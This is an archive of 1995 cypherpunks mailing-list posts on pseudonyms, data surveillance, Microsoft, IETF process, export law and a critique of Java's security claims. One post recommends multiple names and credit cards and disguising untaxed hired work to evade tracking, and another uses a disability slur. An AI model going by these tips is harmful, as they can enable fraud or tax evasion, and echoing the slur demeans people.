So what is a nym if not a "True Name"? I distinguish "True Name" (in quotes) from True Name: a True Name is tied to a matrix of information extrinsic to the entity it refers to (a SS# has no *intrinsic* relation to the entity it designates), whereas a "True Name", though free of this info matrix, neverthless operates according to the same logic that a True Name does -- in terms of being tied to actions that garner reputational shifts. The point being -- I'm probably being pretty unclear -- that if the major distinction between a "True Name" and a True Name are links (or the lack thereof) to arbitary and external information (and maybe the disposability that the lack of links implies), then a lot of nym theory seems like it pretty much reproduces True Name logic and operations. Anyway, a lot of you understand this all better than I do, so I hope to learn from any responses I receive. Thanks. From frissell at panix.com Sun Nov 5 18:22:49 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 6 Nov 1995 10:22:49 +0800 Subject: 800_ape Message-ID: <199511060208.VAA14144@panix.com> At 08:23 AM 11/4/95 -0500, you wrote: > 11-5-95. NYPaper Sunday Magazine: > > "Making Microsoft Safe For Capitalism. How do you restrain > an 800-pound gorilla?" Cover story. By James Gleick. > It's time to draw the line. But where? > > 'Anything not a direct lie or clearly illegal is O.K. to > do if it advances Microsoft's tribal cause,' Mitchell > Kapor says. 'This licenses the worst sort of > manipulations, lies, tortured self-justification and so > on.' So Gleick wants to unleash the Justice Department to protect his ISP from Microsoft's competition. Can't cut it without Big Brother's help, eh? All I've got to say about this piece of commie trash is GM, ATT, IBM, USSR, CIA, & KGB. It took me all of 10 seconds to figure out how to delete the icons for the MSN and MS' Internet Browser from my WIN95 desktop. 
The help message that popped up when I did this also told me how I could delete the actual programs from my hard drive. (Hint James try clicking the *right* mouse button.) DCF "Worrying about a large institution especially when it has computers is like worrying about a large gorilla especially when it's on fire." Bruce Serling. CFP95. From frissell at panix.com Sun Nov 5 18:23:00 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 6 Nov 1995 10:23:00 +0800 Subject: "The Policeman Inside" Message-ID: <199511060208.VAA14131@panix.com> At 09:54 AM 11/5/95 -0800, you wrote: >My point, originally, to Rich Graves' mention of Chris Hibbert's excellent >FAQ on Social Security Numbers and person numbers, is that it is no longer >relevant to fight against a "single index number." Modern data base methods >are so well-suited to cross-indexing that it hardly matters whether there's >a single point of entry to the data base or not. However, modern life is also well-adapted to the counter strategy of fuzzying up any focus on your "cluster of transactions." Thus it is trivial to use multiple names and addresses for multiple transactions. Particularly if you "go bare" in the insurance arena, many tracking opportunities are denied your opponents. This will also save you big bucks in premiums foregone. You also have to watch the stuff most people don't think about like magazine subscriptions which can easily be had in any name (and should be). The current possibility of getting multiple secured credit cards in multiple names will become even more fun as the temporary Visa and Mastercards (travelers's checks on a card) are issued. Plenty of entrepreneurs will be buying and selling those. Just like the phone card market today. >THE KEY POINT IS THIS: Are voluntary economic transactions between persons >to be subject to approval and regulation by the State? They will no doubt try but closed systems have a hard time competing with open systems. 
A good way to track the future control possibilities is to track how easy it is to get an internet account. If it remains as easy to get an internet account in the future as it does today, then it will be very hard to indulge in central transaction controls. I am predicting that there will be a convergence between the ease of communicating over the nets (institutional ease not interface ease) and the ease of completing transactions. I think the convergence will be one sided in the direction of easier and easier transactions. Again, I'm not talking about technical ease here but the structural or institutional ease of completing transactions. "Frictionless Capitalism" is frictionless across the board. The belief that it is possible to "press down upon the brow of labor this Crown of Thorns, to crucify mankind upon a Cross of Red Tape" (to mangle a phrase) is worthy of ridicule. I happened to catch "Funeral in Berlin" today. The Commies didn't manage it with a lot more going for them than Slick Willie has. They got their clocks cleaned by MarketEarth. The Securities and Exchange Commission doesn't stand a chance. >If babysitting and >lawnmowing, not to mention hiring someone to write some C code, requires >submitting tax and Social Security forms, requires checking the J-1 vs. >Permanent Resident vs. Approved Citizen Unit status, then the die is cast. I thought the guy was in Zamboanga (where the monkeys have no tails). At least that's what he told me in his email. The gardener was an independent contractor. The babysitter worked for a temp agency (at least that's what she said). I know I paid a company. At least the digicash went to something with a company name. >Well, the State is becoming more efficient in tracking such things, and tax >penalties are increasing. Not sure if that's true. Are there fewer illegal aliens, fewer people driving without licenses, fewer people practicing medicine without a license, etc than in 1960, 1970, 1980? I seriously doubt it. 
>In closing, we must beware "the policeman inside," to use the William
>Burroughs term. A surveillance state that arises because modern computers
>and data bases allow all economic transactions to be monitored, taxed, and
>approved or disapproved is a horror we should fight with all of our
>resources. Whether right-, left-, or libertarian-leaning, the implications
>of this state power to control our lives are horrible.

No argument there.

DCF

"Freedom isn't Freeh
freedom isn't Freeh
you've got to pay the price
you've got to sacrifice
for your liberty"
-- Here's hoping you're all morally rearmed.

From ses at tipper.oit.unc.edu Sun Nov 5 21:06:07 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 6 Nov 1995 13:06:07 +0800
Subject: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID:

On Sun, 5 Nov 1995, Stephen Whitaker wrote:
> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Multiple choice:

a) Because I have a PPP connection to Dionne's Psychic Internetwork
b) Because my brownian motion RNG used an inferior quality rubber band and I can now travel through time.
c) Because the Earth is round.

Let's work the example:

a) can't be correct, because there's no way anyone on my salary could afford the 1-900- charges.
b) can't be correct because if I could travel in time this weekend, I'd have gone to Ramat Gan with an Uzi, and one of the best generals of the twentieth century would still be alive.
c) could be... I wrote the message from a machine in Menlo Park, which is in the Pacific time zone. Convert both times to GMT, and everything makes sense.

Simon

From eay at mincom.oz.au Sun Nov 5 21:31:54 1995
From: eay at mincom.oz.au (Eric Young)
Date: Mon, 6 Nov 1995 13:31:54 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID:

On Fri, 3 Nov 1995, Futplex wrote:

> Suppose I have serious and plausibly realistic aspirations to become an
> authority in some subtopic of cryptography, network security, etc. (sometime
> well into the next millennium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely? Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete?

I too have thought about this question. While I write crypto code and
know some areas quite well, I also seem to be blessed with the ability to
display my total ignorance in other areas in very public forums. Since I
have no professional reputation to protect (I don't work in the crypto
field) and don't really have any 'aspirations to become an authority', I
feel I can do this so long as I also make an effort to answer the
question in the area of my expertise and to also share the information I
gain.

The difference between ignorance and stupidity is that one decreases with
time :-).

eric (who is quite happy to admit his ignorance :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au | more followups than the message contents :-)

From anonymous-remailer at shell.portal.com Sun Nov 5 23:12:03 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 15:12:03 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <199511060639.WAA20500@jobe.shell.portal.com>

On Wed, 1 Nov 1995 hallam at w3.org wrote:

> > There were two names on the MD5 document -- mine and Bill
> > Simpson's. Bill didn't tell me that he was called (I suspect he
> > would have), and I wasn't called, either.
> > We were the only two
> > editors of that portion of the specification.
>
> This appears to have been a problem from both ends. A number of
> people around here only heard about the IPsec work when it had
> reached the final call phase.

Hmmm, I guess (as usual) people weren't keeping up with the drafts. It
really makes some of us outsiders wonder what the IETF actually does in
its gilded white towers.

> I think this highlights one of the problems with the IETF we need a
> much broader infrastructure for understanding what progress other
> groups have made. The time when we can expect to do everything through
> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance
> as a collaboration tool for their needs. Unfortunately the approach seems
> to be that because there is a person living at the end of a 2400
> baud modem in Vermont who cannot configure his PPP we should all continue
> in the stone age.

I guess that's certainly an _elitist_ attitude.

Let's leave Vermont alone for a second and maybe talk about including the
developing world in the process. That might explain some of the
resistance. In many parts of the world, the basic telecommunications
infrastructure simply won't support a 2400 baud connection. Does this
then mean that there should be no advocate, no voice for citizens from
those regions because they are limited to 300 baud?

Hopefully we all agree that developing nations are equally entitled to a
voice in establishing standards which will define the foundations of the
next century. I can't imagine anyone arguing for a pre-emptive silencing
of voices which strive to be heard through setting technical standards as
a floor -- minimum standards which are designed *purposefully* to
exclude.

Next thing someone will advocate is EBCDIC, or some equally lame idea, I
guess ...

> We could improve readability of RFCs through using HTML and reduce
> the flamage on mailing lists through collaboration tools like the
> open meeting. But we don't because it hasn't been done that way in the
> past.

Well, I think that it is possible to read a mailing list through HTML if
that is what you would like to do. You have that option and choice. But
this does not mean that you should dictate that everyone should follow
your choices and preferences.

While some would argue, that the attempted imposition of your personal
preferences is demonstrative of a monstrous ego that does not recognize
inherent individual jurisdiction, I won't expose myself to the accusation
that I would advance such a specious argument, I will simply ask what you
would suggest is the solution to including alternate views and voices, if
it isn't a mailing list. Will the standards track follow a policy of
inclusion or historic policies of exclusion?

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

It really doesn't take all that long to get up to speed. A couple of
months, tops.

> Phill
>

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From EWilhem at aol.com Mon Nov 6 00:06:50 1995
From: EWilhem at aol.com (EWilhem at aol.com)
Date: Mon, 6 Nov 1995 16:06:50 +0800
Subject: Magic Money
Message-ID: <951106025715_99002994@emout06.mail.aol.com>

Where do I get the software, Please E-mail me at roger12 at cam.org. I'd
like the evaluation software.

From vznuri at netcom.com Mon Nov 6 01:04:34 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Mon, 6 Nov 1995 17:04:34 +0800
Subject: on topic!!
Message-ID: <199511042217.OAA16960@netcom9.netcom.com>

PM and TCM frequently debate about what is relevant on this list. I have
sometimes commented on this.
in fact PM's conservative stance to relevance, and TCM's more liberal
one, and the tension between the two goes back to list origins.

this is a highly inflammable topic, and I am surely going to get my
eyebrows toasted for saying *anything*, however I would like to say a few
things: if there were two key elements here, these conversations would
probably largely go away (instead of continually reappear)

- an unambiguous charter
- an active moderator

unfortunately I suspect that a moderator does exist but he "prefers to
remain anonymous" ("pseudonymous"?). imho that is precisely how *not* to
succeed as a moderator. PM and TCM are indeed filling a genuine vacuum.
when the moderator is AWOL, pseudomoderators fight each other.

(oops, the whole idea of a moderator is just not anarchic enough. well,
then I suggest everyone just enjoy these repeated, endless displays of
public bile and hostility as the basic modus operandi of people who
embrace the glory of anarchy. anarchy in action!! but it is more fun to
deny them as total delusions and effects entirely attributable to one's
enemies..)

--

also, another frequent split on this list is of politics vs. coding.
frankly I think just having two lists, one dedicated to "cypherpunk
politics", the other dedicated to "cypherpunk technicality", would solve
most problems.

and finally again I suggest as I have in the past that no one other than
the moderator really has any authority to say what is or is not relevant.
and if you see someone say what is, take it with a grain of salt, or
ignore it if you like. a major problem is people defending themselves
when they are attacked by someone who says "that's not relevant!!". the
problem is the perception of the loss of face. otherwise, what's the
point? this is an interesting psychological effect that I have observed
even when people use pseudonyms. it seems it is deeply ingrained into
human behavior. this list is in fact imho a hotbed of psychological
displays.
the machismo factor is pretty thick and deep at times too.

to all this I suggest one consider the idea that "criticism by a bonehead
is as flattering as praise from a genius". (hee, hee)

for those who absolutely cannot refrain from trying to yell at other
people about relevant postings (judging by the mail, a rather significant
percentage) I suggest you quote the *charter* whenever you do so, to
demonstrate whatever authority it is you think you have.

--

anyone who needs moderator lessons should take them from S.Sandfort, an
ex teacher who runs cypherpunk meetings involving a lot of childhood
psychologies as effectively as humanly possible, IMHO.

--

p.s. it appears to me the entrance requirements for cypherpunk membership
are to have a 150 IQ and a 75 *EQ*. and that all the arguing and
hostility comes from the more uninhibited pathological cases of these
people.

--

one could in fact have great fun impersonating someone with a grotesquely
low EQ on this list and create a tremendous reaction among all the people
with equally low EQs, responding to the bait with the same intelligence a
fish attacks a wiggling worm. it would be "evolution in action", imho.
(hee, hee.)

From tcmay at got.net Mon Nov 6 17:22:44 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 6 Nov 95 17:22:44 PST
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID:

[Please don't copy Eugene Volokh on your follow-ups; I copied him on my
original because I had quoted him.]

At 10:04 PM 11/6/95, s1113645 at tesla.cc.uottawa.ca wrote:

>Judging by the amount of posting you do here, I was surprised that I only
>got 36 listings on your new address (1/3 of which quoted you but not
>directly written by you). Either you post more to alt, soc and talk (which
>they
>don't have) or you use a third address (the second thing I tried was
>tcmay at netcom.com, even less, though the archive's pretty recent, so that's
>expected).

I do little posting these days on Usenet.
There is almost no sense of "community" there, in the sense of
persistent, memorable posters, and in the sense of even _slightly_ having
similar goals and aspirations. A vast number of the posts on any topic
come from people who just rolled off the turnip truck and who have no
interest in learning.

>I figured I'd send this to you as a private note, but then I figured
>this thing really is scary and has a lot to do with anonymity.
>Watch out folks. Little Brother is saving everything you've ever said on
>usenet. Your old posts just won't go away.

I've assumed this for many years. One used to be able to buy "Usenet on
CD-ROM"...before the volume got to be too high. I've always assumed that
archives would be increasingly available, eventually covering the entire
history of Usenet, going back to the early 80s, and with tools for
tracking the changes in login names over time (so that, for example,
Perry's 1984 postings could be easily retrieved).

Dossier services are coming, of course. If not legal to operate in the
U.S., trivial to locate offshore. ("Employers, we will provide a scan of
prospective employers. We can let you know if potential employees have
ever posted to alt.drugs, alt.homosexual, alt.deviancy, or
alt.cypherpunks. Avoid needless risks.")

>(Not that someone who is so open in his views and true name as yourself
>would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived
>yet. It's bad enough they have rec.)

Huh? What makes you think "alt" is not archived? Just because DejaNews
doesn't index it doesn't mean it isn't archived in various places.

Paul Robichaux pointed me to another searcher, http://www.excite.com/,
which _does_ index the alt groups. I'm sure more are coming, reaching
further and further back in time. (At the rate the Net has been
expanding, by the time they can archive-and-index the last year of
Usenet, they can get the entire history for not much more. I'll bet this
happens by the end of 1997.)

>Ps.
>I will of course run searches on every other address that the who
>command on majordomo at toad.com supplies me with, so watch what you say
>ladies, gents and otherwise. ;->
>Get those 'nyms ready.

I offered the "Blacknet Dossier Service" a couple of years ago to the
Extropians list subscribers. Nick Szabo helped me out by claiming to the
list that he had purchased his dossier contents, and was "shocked" by
what he found. A number of the Extropian list subscribers were quite
perturbed before I told them it was a joke.

Then I pointed out to them that there is absolutely nothing which stops
such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From fc at all.net Mon Nov 6 02:17:23 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 18:17:23 +0800
Subject: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <9511061002.AA10494@all.net>

> I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
> minutes out of step and having lowered my reputation in his/her eyes. Now
> I'll ask my question again, which apparently got lost in the collective
> groan of my stale post:

You're just fine.

> Are there ways for someone with access to modify router tables
> to constantly create alternate paths at other routers
> which would serve to end-around any such snoops?

Yes - and for other purposes as well.

...

> I can hardly find anyone who even cares about the fact that our legislature
> relies on the executive branch gov-net managers for their port/connection on
> the internet router. They also rely on the executive branch for
> troubleshooting their Novell LAN. Does anyone else see a separation of
> powers issue or privacy issue here? Note that I cc: the speaker, who cares
> but doesn't yet grasp the implications. Feel free to write him directly. His
> name is Michael Obuchowski, Obe for short, , tell
> him I sent you.

Is this really him, or just a secretary with electronically generated
keyword search and reply capabilities?

...

> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Time zone differences. I also wish my mailer understood GMT so it would
properly sort events in time order instead of sender time of day order.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From perry at piermont.com Mon Nov 6 18:20:48 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 95 18:20:48 PST
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID: <199511070208.VAA14762@jekyll.piermont.com>

"Peter D. Junger" writes:

> : I understand that you are a lawyer and I'm not, but it is my
> : understanding that international treaties come in to play on this sort
> : of thing. For instance, in international shipments, you can transship
> : items and substances that are illegal to possess in a country through
> : its ports provided that the materials do not originate or terminate
> : their shipment in the country and remain sealed in their containers
> : throughout.
> : It is also my understanding that items like mail and phone
> : calls that happen to transit a country are not necessarily subject to
> : that nations laws provided that the nation is not a terminal point for
> : the mail or call or what have you.
>
> The trouble is that the ITAR's definition of export that is relevant
> to cryptographic software has nothing to do with exporting in the
> normal sense, and therefore it has nothing to do with transhipments.

I am starting to have trouble believing you are a lawyer.

Are you actually telling me that treaties which explicitly indemnify
transshipment customers against local laws are superseded by lower level
laws, in spite of the supremacy clause of the constitution? That might be
what the state department would tell you, but I'd have trouble believing
even a lobotomized mongoloid judge would let that stand. Treaties are
treaties, period.

Perry

From fc at all.net Mon Nov 6 03:02:23 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:02:23 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <9511061047.AA13370@all.net>

WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS A
FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

From the Java Web pages (as combined in Firewalls/BoS):

> The language's security features (not just applets):
>
> (http://java.sun.com/whitePaper/javawhitepaper_6.html#HEADING15)
>
> 4.2 Security in the Java Environment
>
> Security commands a high premium in the growing use of the Internet
> for products and services ranging from electronic distribution of
> software and multimedia content, to "digital cash". The area of
> security with which we're concerned here is how the Java compiler and
> run-time system restrict application programmers from creating
> subversive code.

But not non-subversive code? Sounds like a value judgement to me.
Subversive code is not otherwise defined in these documents.

> The Java language compiler and run-time system implement several
> layers of defense against potentially incorrect code.

Is incorrect code subversive? Vice versa? Does Java provide defenses
against my code not properly calculating numbers?

> One of the Java
> compiler's primary lines of defense is its memory allocation and
> reference model. Simply put, Java does not have "pointers" in the
> traditional C and C++ sense--memory cells that contain the addresses
> of other memory cells.
>
> Memory layout decisions are not made by the compiler, as they are in C
> and C++. Rather, memory layout is deferred to run-time, and will
> potentially differ depending on the characteristics of the hardware
> and software platforms on which the Java language system is
> executing. The Java interpreter references memory via symbolic
> "handles" that are resolved to real memory addresses at run time. Java
> programmers can't forge pointers to memory, because the memory
> allocation and referencing model is completely opaque to the
> programmer and controlled entirely by the underlying run-time system.

Just because it is opaque, doesn't mean you can't happen across a valid
(but perhaps undesirable) handle. Sounds like a good issue for attack by
crypto-types. How do we guess the handle of the disk IO routines?

> Very late binding of structures to memory means that programmers can't
> infer the physical memory layout of a class by looking at its
> declaration. By removing the C/C++ memory layout and pointer models,
> the Java language has eliminated the programmer's ability to get
> behind the scenes and manufacture pointers to memory. These features
> must be viewed as positive benefits rather than a restriction on the
> programmer, because they ultimately lead to more reliable and secure
> applications.

Is the language un-predictable? The same program executes differently
each time? A pseudo-random allocation?
What is the technique used to implement this, and why should we believe
it is in fact secure in some sense. And if so, in what sense?

> The Byte Code Verification Process
>
> What about the concept of a "hostile compiler"? Although the Java
> compiler ensures that Java source code doesn't violate the safety
> rules,

What are these "safety rules"? No reference to them in this document!

> when an application such as the HotJava web browser imports a
> code fragment from anywhere, it doesn't actually know if code
> fragments follow the Java language rules for safety--the code may not
> have been produced by a known-to-be trustworthy Java compiler. In such
> a case, how is the Java run-time system on your machine to trust the
> incoming byte code stream? The answer is simple--it doesn't trust the
> incoming code, but subjects it to byte code verification.
>
> The tests range from simple verification that the format of a code
> fragment is correct, to passing through a simple theorem prover to
> establish that the code fragment plays by the rules--that it doesn't
> forge pointers, it doesn't violate access restrictions, and it
> accesses objects as what they are (for example, that "InputStream"
> objects are always used as "InputStreams" and never as anything
> else). A language that is safe, plus run-time verification of
> generated code, establishes a base set of guarantees that interfaces
> cannot be violated.

Wait a minute. If it's so safe, what code can possibly be sent in that
would cause a violation? If the prover is so simple, how can it show
things (e.g., program correctness) in real-time on a PC that the rest of
the world can't show with supercomputers over extended periods? What
EXACTLY are these things doing, and why should we believe they are safe?

> The Byte Code Verifier
>
> The last phase of the byte code loader is the verifier.
> It traverses
> the byte codes, constructs the type state information, and verifies
> the types of the parameters to all the byte code instructions.
> The illustration [see the HTML] shows the flow of data and control
> from Java language source code through the Java compiler, to the byte
> code verifier and hence on to the Java interpreter. The important
> issue is that the Java class loader and the byte code verifier make no
> assumptions about the primary source of the byte code stream--the code
> may have come from the local system, or it may have travelled halfway
> around the planet. The byte code verifier acts as a sort of
> gatekeeper. The byte code verifier ensures that the code passed to the
> Java interpreter is in a fit state to be executed and can run without
> fear of breaking the Java interpreter.

So there are byte code sequences that can break the interpreter!

> Imported code is not allowed to
> execute by any means until after it has passed the verifier's
> tests. Once the verifier is done, a number of important properties are
> known:
>
> There are no operand stack overflows or underflows

Not so easily proven, is it?

> The types of the parameters of all byte code instructions are
> known to always be correct

Huh? I thought you couldn't have incorrect types. Do they mean that you
can have incorrect types but that they are detected by the verifier at
load time?

> No illegal data conversions are done, like converting integers
> to pointers

How about legal ones - like converting integers to pointers via case
statements?

> Object field accesses are known to be legal--private or public
> or protected

What exactly does this mean?

> While all this checking appears excruciatingly detailed, by the time
> the byte code verifier has done its work, the Java interpreter can
> proceed knowing that the code will run securely. Knowing these
> properties makes the Java interpreter much faster, because it doesn't
> have to check anything.
> There are no operand type checks and no stack
> overflow checks. The interpreter can thus function at full speed
> without compromising reliability.

Can computers actually "know" anything? No runtime checking whatsoever.
Get past the supposed verifier, and you have free run of the machine. A
single verifier bug or inadequacy, and the world is unsafe for electronic
commerce. And has the Java code been verified to prove the claimed
properties? Against what criteria? Where's the beef?

> Security Checks in the Class Loader
>
> After incoming code has been vetted and determined clean by the byte
> code verifier, the next line of defense is the Java class loader. The
> environment seen by a thread of execution running Java byte codes can
> be visualized as a set of classes partitioned into separate name
> spaces. There is one name space for classes that come from the local
> file system, and a separate name space for each network source.
>
> When a class is imported from across the network it is placed into the
> private name space associated with its origin. When a class references
> another class, it is first looked for in the name space for the local
> system (built-in classes), then in the name space of the referencing
> class. There is no way that an imported class can "spoof" a built-in
> class. Built-in classes can never accidentally reference classes in
> imported name spaces--they can only reference such classes
> explicitly. Similarly, classes imported from different places are
> separated from each other.

But they can explicitly reference each other? I can only explicitly open
a file called command.com on your PC?

> Security in the Java Networking Package
>
> Java's networking package provides the interfaces to handle the
> various network protocols (FTP, HTTP, Telnet, and so on). This is your
> front line of defense at the network interface level. The networking
> package can be set up with configurable levels of paranoia.
> You can:
>
> Disallow all network accesses
>
> Allow all network accesses
>
> Allow network accesses to only the hosts from which the code was
> imported
>
> Allow network accesses only outside the firewall if the code
> came from outside

Who wants to bet that 99+% of all users configure "Allow all network
accesses". Hot Java today is defaulted to this state.

> Applet-specific security: (written for the 1.0a3 release of
> HotJava(tm)... there will be a rewrite for the 1.0b release when that
> occurs. I'm assuming, perhaps incorrectly, that the Netscape
> implementation is similar. As I understand it, they licensed the HJ
> code from Sun, so I think it's all very close to the truth.)
>
> (http://java.sun.com/1.0alpha3/doc/security/security.html)
>
> [ A rehash of the above text, snipped ]
>
> Security level four: protecting the file system and network access
>
> HotJava enforces security policies confident that its security
> interfaces are secure.

In other words, it assumes the other three levels worked properly. If
they don't, you're screwed.

> The three lower levels of security guarantee
> that all local classes, e.g., the file access primitives, are
> themselves protected from being supplanted, replaced, or extended by
> imported code.

You're screwed.

> The file access primitives implement an access control list that
> controls read and write access to files by imported code (or code
> invoked by imported code). The defaults for these access control lists
> are very restrictive[*]. If an attempt is made by a piece of imported
> code to access a file to which access has not been granted, a dialog
> box pops up to allow the user to decide whether or not to allow that
> specific access. These security policies err on the conservative side
> in order to ensure maximum security. This conservative approach may
> make writing some applets more difficult or awkward.

By default - ask the user. That's restrictive?
Please press the OK button to have our free Lotus update loaded into your
computer.

> For network security, HotJava provides a variety of mechanisms that
> can provide information about the trustworthiness of imported
> code. These mechanisms cover a wide range of possibilities. At the
> simple end the system can check on the origin of a code fragment to
> determine if it came from inside or outside a firewall. At the
> sophisticated end of the range a mechanism exists whereby public keys
> and cryptographic message digests can be securely attached to code
> fragments that not only identify who originated the code, but
> guarantee its integrity as well. This latter mechanism will be
> implemented in future releases.

So today, if the admin specifies the proper IP address ranges when
loading Java into each computer in the network, and if no user ever
installs Java on their own, "code" downloads from external machines may
be stopped - unless the user says OK.

> The security policies implemented by the runtime system can be
> dynamically adjusted based on the information available concerning the
> origin of a code fragment. The Socket class provides such an example.
>
> The Socket class implements security policies that are adjusted to
> reflect the trustworthiness of the code that invoked it, and
> transitively, the code that invoked the invoker. The information about
> what code began the chain of execution is available to the class in
> the form of which namespace contains the invoking code and what
> parameters are associated with that class. The class loader puts the
> classes it has loaded in a specific namespace, allowing the Socket
> class to determine the network host from which a class is loaded.
>
> Knowing the network host allows the HotJava security mechanism to
> determine whether the class originated inside or outside a
> firewall. Knowledgeable users of HotJava can decide which category of
> hosts to trust when loading executable code.

How about the more than 99.99% of users who are not knowledgeable of
HotJava?

> For example, the Socket
> class can implement the policy of only allowing new connections to be
> created that terminate at the host from whence the code was
> loaded. This restriction means that code loaded from outside a
> firewall cannot connect to other machines on the net behind the
> firewall.

Unless that machine acts as a gateway for further processing.

> Code that comes from more trusted sources can be allowed
> more freedom to make connections to other machines. As an additional
> defense against untrusted sources HotJava's security can be set to
> prevent any code from being loaded. The level of security is
> configurable by HotJava users.

The user dictates the security policy. Any user in your site can
potentially, through error or omission or intent, open up a hole to your
entire network by accidentally pressing the OK button one time or by
setting a configuration parameter incorrectly. And your firewall will not
save you.

ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.

P.S.
When: Tuesday, November 7, 8AM
Where: The Hilton, Washington D.C. (the CSI conference)
The talk: 50 Ways to Attack Your World Wide Web Systems

If you want a chance to heckle - be there.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From anonymous-remailer at shell.portal.com Mon Nov 6 03:02:52 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 19:02:52 +0800
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511061050.CAA17098@jobe.shell.portal.com>

On Sat, 4 Nov 1995 don at cs.byu.edu wrote:

> An anonymous complainer writes:
>
> >Well, Perry, my opinion is that there is far too much noise on this list
> >as it is. I have already seen my words drowned out by bellyaching over
> >next to nothing.
>
> POT-KETTLE-BLACK.
>
> Also, since nothing you've written (in your commentary, as opposed to
> anonymous announcements or releases that most people use anonymity for
> here) indicates that you're using anonymity for any particular reason,

Hmmm, I'm not sure that anyone has an inherent right to question WHY a
person seeks moments of anonymity or privacy. I don't believe that anyone
should be placed on the defensive, for *choosing* to maintain some
semblance of a personal life, or wishing to maintain some illusions that
they might still have some shred of personal privacy left.

Hopefully, we can still leave a man with his dignity.

I should not have to defend my right to present my ideas as I believe are
appropriate to the circumstances. My choice to present the idea, that an
entire economic sector needs to carefully reevaluate their strategic
choices, and their discovered hidden security attitudes -- will stand or
fall strictly on its merits. The debate is not advanced in any way by
attaching a reputation to the question.

Like any other person, I have my skeletons, and I have my regrets. I
certainly have unfinished, unresolved, issues that I need to tend to. In
that sense, I am no different than any other man. I also realize that
ultimately, I'll have to come forward from behind the veil of secrecy
which is provided to me. This I will do, after I have reconciled my own
security considerations.

Please allow me the boundary and dignity to choose when, where, and in
what form I choose to reveal myself. That inherent right, should be
extended to any man, and no man should be called to account for his
desire to maintain his personal privacy, no matter how arbitrary his
reasons. Especially when he comes forward to challenge Goliath.

> please stop so people can killfile you. Or send it from a nym at
> alpha.c2.org. I mean, the NSA has your real name anyway, what's the
> point...

At this time, I don't feel that a bi-directional private communications
channel is needed.
I have no need for a "nym". People who need to contact me, can. People
who would like to know a bit about me, can.

Netscape has my address. So does AT&T. And reputations aren't
pertinent. (Although, I will say, that the disappearing here-again, gone
again, internet draft at ds.internic.net is simply childish, and I'm
certain that it was just routine "file maintenance" that caused the
flicker.)

The ball isn't in my court, it's in theirs. Netscape and AT&T are some
of the primary parties who will have to take the hit for the fiasco that
they find themselves in. For now, I'll leave my communication channels
with them open, rather than letting my mail queue fill more than it
already has. Email that is already overqueued.

I don't really envy the two companies' position. No one expects to find
as significant a security flaw as my anonymous email to this list
detailed at this stage of code Burn-In, and I don't take any pleasure in
facing the unenviable task of informing ANY party that a Trojan Horse
has been engineered into the fabric of an existing globally installed
code base. No one does.

And as the messenger, I (hope) I don't have anything to fear, from the NSA
or any other foreign group that would seek to pursue its own agenda within
the borders of sovereign Canada. I really don't think that the NSA is
"evil incarnate", as some list subscribers do. They have their
intelligence and know how to use it. Usually, they use it prudently.

If I did have any worries about the NSA, then I might take some
elementary precautions. I certainly wouldn't have my terminal screen
pointing towards the twelve odd feet of open glazing that sits behind
me, as I currently do.

Privacy can't simply be reduced to "a desire to hide from the NSA", just
as security isn't something which is simply provided by licensing from
RSA.

Look to the message rather than the messenger.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From merriman at arn.net Mon Nov 6 03:12:24 1995
From: merriman at arn.net (David K. Merriman)
